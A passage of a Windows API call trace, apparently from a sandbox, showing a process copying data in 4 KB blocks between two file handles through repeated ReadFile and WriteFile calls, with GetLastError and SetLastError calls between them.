lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.469] GetLastError () returned 0x0 [0077.469] SetLastError (dwErrCode=0x0) [0077.469] GetLastError () returned 0x0 [0077.469] SetLastError (dwErrCode=0x0) [0077.469] GetLastError () returned 0x0 [0077.469] SetLastError (dwErrCode=0x0) [0077.470] GetLastError () returned 0x0 [0077.470] SetLastError (dwErrCode=0x0) [0077.470] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.470] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.470] GetLastError () returned 0x0 [0077.470] SetLastError (dwErrCode=0x0) [0077.470] GetLastError () returned 0x0 [0077.470] SetLastError (dwErrCode=0x0) [0077.470] GetLastError () returned 0x0 [0077.470] SetLastError (dwErrCode=0x0) [0077.470] GetLastError () returned 0x0 [0077.470] SetLastError (dwErrCode=0x0) [0077.470] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.470] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.470] GetLastError () returned 0x0 [0077.470] SetLastError (dwErrCode=0x0) [0077.470] GetLastError () returned 0x0 [0077.470] SetLastError (dwErrCode=0x0) [0077.470] GetLastError () returned 0x0 [0077.471] SetLastError (dwErrCode=0x0) [0077.471] GetLastError () returned 0x0 [0077.471] SetLastError (dwErrCode=0x0) [0077.471] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.471] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.471] GetLastError () returned 0x0 [0077.471] SetLastError (dwErrCode=0x0) [0077.471] GetLastError () returned 0x0 [0077.471] SetLastError (dwErrCode=0x0) [0077.471] GetLastError () returned 0x0 [0077.471] SetLastError (dwErrCode=0x0) [0077.471] GetLastError () returned 0x0 [0077.471] SetLastError (dwErrCode=0x0) [0077.471] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.471] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.471] GetLastError () returned 0x0 [0077.471] SetLastError (dwErrCode=0x0) [0077.471] GetLastError () returned 0x0 [0077.471] SetLastError (dwErrCode=0x0) [0077.472] GetLastError () returned 0x0 [0077.472] SetLastError (dwErrCode=0x0) [0077.472] GetLastError () returned 0x0 [0077.472] SetLastError (dwErrCode=0x0) [0077.472] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.472] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.472] GetLastError () returned 0x0 [0077.472] SetLastError (dwErrCode=0x0) [0077.472] GetLastError () returned 0x0 [0077.472] SetLastError (dwErrCode=0x0) [0077.472] GetLastError () returned 0x0 [0077.472] SetLastError (dwErrCode=0x0) [0077.472] GetLastError () returned 0x0 [0077.472] SetLastError (dwErrCode=0x0) [0077.472] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.472] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.472] GetLastError () returned 0x0 [0077.473] SetLastError (dwErrCode=0x0) [0077.473] GetLastError () returned 0x0 [0077.473] SetLastError (dwErrCode=0x0) [0077.473] GetLastError () returned 0x0 [0077.473] SetLastError (dwErrCode=0x0) [0077.473] GetLastError () returned 0x0 [0077.473] SetLastError (dwErrCode=0x0) [0077.473] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.473] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.473] GetLastError () returned 0x0 [0077.473] SetLastError (dwErrCode=0x0) [0077.473] GetLastError () returned 0x0 [0077.473] SetLastError (dwErrCode=0x0) [0077.473] GetLastError () returned 0x0 [0077.473] SetLastError (dwErrCode=0x0) [0077.473] GetLastError () returned 0x0 [0077.473] SetLastError (dwErrCode=0x0) [0077.473] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.473] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.473] GetLastError () returned 0x0 [0077.474] SetLastError (dwErrCode=0x0) [0077.474] GetLastError () returned 0x0 [0077.474] SetLastError (dwErrCode=0x0) [0077.474] GetLastError () returned 0x0 [0077.474] SetLastError (dwErrCode=0x0) [0077.474] GetLastError () returned 0x0 [0077.474] SetLastError (dwErrCode=0x0) [0077.474] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.474] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.474] GetLastError () returned 0x0 [0077.474] SetLastError (dwErrCode=0x0) [0077.474] GetLastError () returned 0x0 [0077.474] SetLastError (dwErrCode=0x0) [0077.474] GetLastError () returned 0x0 [0077.474] SetLastError (dwErrCode=0x0) [0077.474] GetLastError () returned 0x0 [0077.474] SetLastError (dwErrCode=0x0) [0077.474] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.474] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.475] GetLastError () returned 0x0 [0077.475] SetLastError (dwErrCode=0x0) [0077.475] GetLastError () returned 0x0 [0077.475] SetLastError (dwErrCode=0x0) [0077.475] GetLastError () returned 0x0 [0077.475] SetLastError (dwErrCode=0x0) [0077.475] GetLastError () returned 0x0 [0077.475] SetLastError (dwErrCode=0x0) [0077.475] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.475] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.475] GetLastError () returned 0x0 [0077.475] SetLastError (dwErrCode=0x0) [0077.475] GetLastError () returned 0x0 [0077.475] SetLastError (dwErrCode=0x0) [0077.475] GetLastError () returned 0x0 [0077.475] SetLastError (dwErrCode=0x0) [0077.475] GetLastError () returned 0x0 [0077.475] SetLastError (dwErrCode=0x0) [0077.475] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.475] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.476] GetLastError () returned 0x0 [0077.476] SetLastError (dwErrCode=0x0) [0077.476] GetLastError () returned 0x0 [0077.476] SetLastError (dwErrCode=0x0) [0077.476] GetLastError () returned 0x0 [0077.476] SetLastError (dwErrCode=0x0) [0077.476] GetLastError () returned 0x0 [0077.476] SetLastError (dwErrCode=0x0) [0077.476] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.476] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.476] GetLastError () returned 0x0 [0077.476] SetLastError (dwErrCode=0x0) [0077.476] GetLastError () returned 0x0 [0077.476] SetLastError (dwErrCode=0x0) [0077.476] GetLastError () returned 0x0 [0077.476] SetLastError (dwErrCode=0x0) [0077.476] GetLastError () returned 0x0 [0077.476] SetLastError (dwErrCode=0x0) [0077.476] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.476] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.477] GetLastError () returned 0x0 [0077.477] SetLastError (dwErrCode=0x0) [0077.477] GetLastError () returned 0x0 [0077.477] SetLastError (dwErrCode=0x0) [0077.477] GetLastError () returned 0x0 [0077.477] SetLastError (dwErrCode=0x0) [0077.477] GetLastError () returned 0x0 [0077.477] SetLastError (dwErrCode=0x0) [0077.477] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.679] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.679] GetLastError () returned 0x0 [0077.679] SetLastError (dwErrCode=0x0) [0077.679] GetLastError () returned 0x0 [0077.680] SetLastError (dwErrCode=0x0) [0077.680] GetLastError () returned 0x0 [0077.680] SetLastError (dwErrCode=0x0) [0077.680] GetLastError () returned 0x0 [0077.680] SetLastError (dwErrCode=0x0) [0077.680] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.680] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.680] GetLastError () returned 0x0 [0077.680] SetLastError (dwErrCode=0x0) [0077.680] GetLastError () returned 0x0 [0077.680] SetLastError (dwErrCode=0x0) [0077.680] GetLastError () returned 0x0 [0077.680] SetLastError (dwErrCode=0x0) [0077.680] GetLastError () returned 0x0 [0077.680] SetLastError (dwErrCode=0x0) [0077.680] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.680] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.681] GetLastError () returned 0x0 [0077.681] SetLastError (dwErrCode=0x0) [0077.681] GetLastError () returned 0x0 [0077.681] SetLastError (dwErrCode=0x0) [0077.681] GetLastError () returned 0x0 [0077.681] SetLastError (dwErrCode=0x0) [0077.681] GetLastError () returned 0x0 [0077.681] SetLastError (dwErrCode=0x0) [0077.681] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.681] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.682] GetLastError () returned 0x0 [0077.682] SetLastError (dwErrCode=0x0) [0077.682] GetLastError () returned 0x0 [0077.682] SetLastError (dwErrCode=0x0) [0077.682] GetLastError () returned 0x0 [0077.682] SetLastError (dwErrCode=0x0) [0077.682] GetLastError () returned 0x0 [0077.682] SetLastError (dwErrCode=0x0) [0077.682] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.682] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.682] GetLastError () returned 0x0 [0077.682] SetLastError (dwErrCode=0x0) [0077.682] GetLastError () returned 0x0 [0077.682] SetLastError (dwErrCode=0x0) [0077.682] GetLastError () returned 0x0 [0077.682] SetLastError (dwErrCode=0x0) [0077.682] GetLastError () returned 0x0 [0077.682] SetLastError (dwErrCode=0x0) [0077.683] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.683] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.683] GetLastError () returned 0x0 [0077.683] SetLastError (dwErrCode=0x0) [0077.683] GetLastError () returned 0x0 [0077.683] SetLastError (dwErrCode=0x0) [0077.683] GetLastError () returned 0x0 [0077.683] SetLastError (dwErrCode=0x0) [0077.683] GetLastError () returned 0x0 [0077.683] SetLastError (dwErrCode=0x0) [0077.683] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.683] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.683] GetLastError () returned 0x0 [0077.683] SetLastError (dwErrCode=0x0) [0077.683] GetLastError () returned 0x0 [0077.683] SetLastError (dwErrCode=0x0) [0077.683] GetLastError () returned 0x0 [0077.683] SetLastError (dwErrCode=0x0) [0077.684] GetLastError () returned 0x0 [0077.684] SetLastError (dwErrCode=0x0) [0077.684] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.684] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.684] GetLastError () returned 0x0 [0077.684] SetLastError (dwErrCode=0x0) [0077.684] GetLastError () returned 0x0 [0077.684] SetLastError (dwErrCode=0x0) [0077.684] GetLastError () returned 0x0 [0077.684] SetLastError (dwErrCode=0x0) [0077.684] GetLastError () returned 0x0 [0077.684] SetLastError (dwErrCode=0x0) [0077.684] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.684] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.684] GetLastError () returned 0x0 [0077.684] SetLastError (dwErrCode=0x0) [0077.684] GetLastError () returned 0x0 [0077.684] SetLastError (dwErrCode=0x0) [0077.684] GetLastError () returned 0x0 [0077.685] SetLastError (dwErrCode=0x0) [0077.685] GetLastError () returned 0x0 [0077.685] SetLastError (dwErrCode=0x0) [0077.685] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.685] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.685] GetLastError () returned 0x0 [0077.685] SetLastError (dwErrCode=0x0) [0077.685] GetLastError () returned 0x0 [0077.685] SetLastError (dwErrCode=0x0) [0077.685] GetLastError () returned 0x0 [0077.685] SetLastError (dwErrCode=0x0) [0077.685] GetLastError () returned 0x0 [0077.685] SetLastError (dwErrCode=0x0) [0077.685] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.685] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.685] GetLastError () returned 0x0 [0077.685] SetLastError (dwErrCode=0x0) [0077.685] GetLastError () returned 0x0 [0077.686] SetLastError (dwErrCode=0x0) [0077.686] GetLastError () returned 0x0 [0077.686] SetLastError (dwErrCode=0x0) [0077.686] GetLastError () returned 0x0 [0077.686] SetLastError (dwErrCode=0x0) [0077.686] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.686] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.686] GetLastError () returned 0x0 [0077.686] SetLastError (dwErrCode=0x0) [0077.686] GetLastError () returned 0x0 [0077.686] SetLastError (dwErrCode=0x0) [0077.686] GetLastError () returned 0x0 [0077.686] SetLastError (dwErrCode=0x0) [0077.686] GetLastError () returned 0x0 [0077.686] SetLastError (dwErrCode=0x0) [0077.686] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.686] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.687] GetLastError () returned 0x0 [0077.687] SetLastError (dwErrCode=0x0) [0077.687] GetLastError () returned 0x0 [0077.687] SetLastError (dwErrCode=0x0) [0077.687] GetLastError () returned 0x0 [0077.687] SetLastError (dwErrCode=0x0) [0077.687] GetLastError () returned 0x0 [0077.687] SetLastError (dwErrCode=0x0) [0077.687] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.687] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.687] GetLastError () returned 0x0 [0077.687] SetLastError (dwErrCode=0x0) [0077.687] GetLastError () returned 0x0 [0077.687] SetLastError (dwErrCode=0x0) [0077.687] GetLastError () returned 0x0 [0077.687] SetLastError (dwErrCode=0x0) [0077.687] GetLastError () returned 0x0 [0077.687] SetLastError (dwErrCode=0x0) [0077.687] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.687] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.688] GetLastError () returned 0x0 [0077.688] SetLastError (dwErrCode=0x0) [0077.688] GetLastError () returned 0x0 [0077.688] SetLastError (dwErrCode=0x0) [0077.688] GetLastError () returned 0x0 [0077.688] SetLastError (dwErrCode=0x0) [0077.688] GetLastError () returned 0x0 [0077.688] SetLastError (dwErrCode=0x0) [0077.688] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.688] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.688] GetLastError () returned 0x0 [0077.688] SetLastError (dwErrCode=0x0) [0077.688] GetLastError () returned 0x0 [0077.688] SetLastError (dwErrCode=0x0) [0077.688] GetLastError () returned 0x0 [0077.688] SetLastError (dwErrCode=0x0) [0077.688] GetLastError () returned 0x0 [0077.688] SetLastError (dwErrCode=0x0) [0077.688] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.688] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.689] GetLastError () returned 0x0 [0077.689] SetLastError (dwErrCode=0x0) [0077.689] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.689] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.689] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.689] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, 